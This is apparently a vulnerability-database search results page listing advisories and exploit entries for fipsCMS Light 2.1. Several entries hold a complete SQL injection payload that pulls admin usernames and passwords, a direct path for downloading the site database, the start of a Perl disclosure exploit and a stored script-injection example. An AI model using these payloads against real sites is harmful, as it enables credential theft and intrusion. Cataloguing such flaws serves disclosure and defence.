15 matches found
EUVD-2009-2018
Malware in sbrugna...
EUVD-2008-3403
Malware in sbrugna...
fipsCMS light <= 2.1 (r) Remote SQL Injection Vulnerability
No description provided by source. Exploit Code: victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin http://localhost:2222/lab/cms/admin...
fipsCMS Light 2.1 Database Disclosure
!/usr/bin/perl fipsCMS Light 2.1 Arbitrary Database Disclosure Exploit Exploit by d3b4g script:http://fipsasp.com Demo: http://demo.fipsasp.com/fipsCMSlight/fipsdb/db.mdb From Tiny little island of maldivies use LWP::Simple; use LWP::UserAgent; print "\fipsCMS Light 2.1 Arbitrary Database...
Improper access control
fipsCMS Light 2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file and obtain sensitive information via a direct request for fipsdb/db.mdb...
CVE-2009-2022
fipsCMS Light 2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file and obtain sensitive information via a direct request for fipsdb/db.mdb...
CVE-2009-2022
fipsCMS Light 2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file and obtain sensitive information via a direct request for fipsdb/db.mdb...
fipsCMS Light 2.1 Database Disclosure
@=======================================@ ====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG===== @=======================================@ @=Author : ByALBAYX @=Website : WWW.C4TEAM.ORG @===============TURKISH=================@ @=======================================@ @=Script : fipsCMS Light 2.1 @=S.Sit...
FipsCMS Light 2.1 - db.mdb Remote Database Disclosure
FipsCMS Light 2.1 - db.mdb Remote Database Disclosure @=======================================@ ====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG===== @=======================================@ @=Author : ByALBAYX @=Website : WWW.C4TEAM.ORG @===============TURKISH=================@...
FipsCMS Light 2.1 - 'db.mdb' Remote Database Disclosure
@=======================================@ ====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG===== @=======================================@ @=Author : ByALBAYX @=Website : WWW.C4TEAM.ORG @===============TURKISH=================@ @=======================================@ @=Script : fipsCMS Light 2.1 @=S.Sit...
CVE-2008-3417
SQL injection vulnerability in home/index.asp in fipsCMS light 2.1 and earlier allows remote attackers to execute arbitrary SQL commands via the r parameter, a different vector than CVE-2006-6115 and CVE-2007-2561...
fipscmslight-sql.txt
Exploit Code: victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin http://localhost:2222/lab/cms/admin Download:http://login.fipsasp.com/File.asp?ID=60&CatID=5 Foun...
fipsCMS light <= 2.1 (r) Remote SQL Injection Vulnerability
Exploit for unknown platform in category web applications =========================================================== fipsCMS light = 2.1 r Remote SQL Injection Vulnerability =========================================================== Exploit Code: victim/path/home/index.asp?w=pages&r=9999999 uni...
FipsCMS Light 2.1 - 'r' SQL Injection
Exploit Code: victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin http://localhost:2222/lab/cms/admin Download:http://login.fipsasp.com/File.asp?ID=60&CatID=5 Foun...
fipsCMS light - vulnerable to script injection.
fipsCMS lights is a freeware product of fipsasp.com. If you log on as admin, you can generate new pages in the CMS system. If you inject the "headline" field with scriptingcode like scriptalert‘code executed’/script, this will automaticly launch when a users visits that site. Please credit to:...